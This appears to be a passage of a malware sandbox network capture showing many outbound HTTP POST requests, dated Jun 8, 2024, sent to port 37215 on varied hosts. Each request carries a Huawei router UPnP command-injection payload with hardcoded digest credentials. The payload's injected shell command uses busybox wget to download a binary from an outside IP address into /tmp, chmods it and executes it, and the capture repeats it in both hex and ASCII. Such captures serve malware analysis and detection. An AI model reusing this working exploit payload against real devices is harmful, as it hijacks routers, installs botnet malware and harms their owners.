                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1638192.168.2.1544932156.246.10.22837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.460988998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1639192.168.2.1548620156.82.88.24437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461014986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1640192.168.2.1542988156.218.94.1037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461015940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1641192.168.2.1559738156.84.52.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461033106 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1642192.168.2.1534376156.145.122.9737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461071968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1643192.168.2.1538676156.190.5.12237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461093903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1644192.168.2.1545086156.248.248.19637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461093903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1645192.168.2.1550996156.101.244.17437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461122990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1646192.168.2.1550820156.28.42.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461143970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1647192.168.2.1550732156.239.32.11537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461183071 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
